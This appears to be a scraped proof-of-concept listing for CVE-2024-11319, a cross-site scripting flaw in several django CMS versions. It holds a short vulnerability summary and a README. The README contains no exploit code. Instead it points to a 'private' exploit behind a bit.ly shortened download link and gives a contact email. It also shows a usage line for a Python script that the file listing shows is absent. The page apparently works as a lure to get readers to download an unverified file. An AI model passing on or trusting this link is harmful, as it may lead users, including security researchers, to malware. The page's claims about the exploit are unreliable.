CVE-2024-11319 PoC — django CMS Security Vulnerability

Source
Associated Vulnerability
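Title: django CMS Security Vulnerability (CVE-2024-11319)
Description: django CMS is an open-source enterprise content management system built on the Django framework and developed by django CMS. django CMS versions 3.11.7, 3.11.8, 4.1.2 and 4.1.3 contain a security vulnerability that stems from improper neutralization of input during web page generation, leaving them susceptible to cross-site scripting attacks.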
Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)
Readme
# CVE-2024-11319: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)

## Overview

An Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability has been identified in django CMS Association's django-cms.

## Exploit
**[Download Here](https://bit.ly/3APaYDU)**

## Details
+ **CVE ID:** CVE-2024-11319
+ **Published:** 18/11/2024
+ **Impact:** Critical
+ **Exploit Availability:** Not public, only private.
+ **CVSS:** 9.3


## Vulnerability Description

This vulnerability allows an attacker to execute malicious scripts in a user's browser within the context of the affected django-cms site.


## Affected Versions

This issue affects **django-cms: 3.11.7, 3.11.8, 4.1.2, 4.1.3.**


## Usage
```
python CVE-2024-11319.py
```

## Contact
For inquiries, please contact famixcm@thesecure.biz

File Snapshot

[4.0K] /data/pocs/b19860576e05511387aec488c221aca8f09fd16c
└── [ 936] README.md

0 directories, 1 file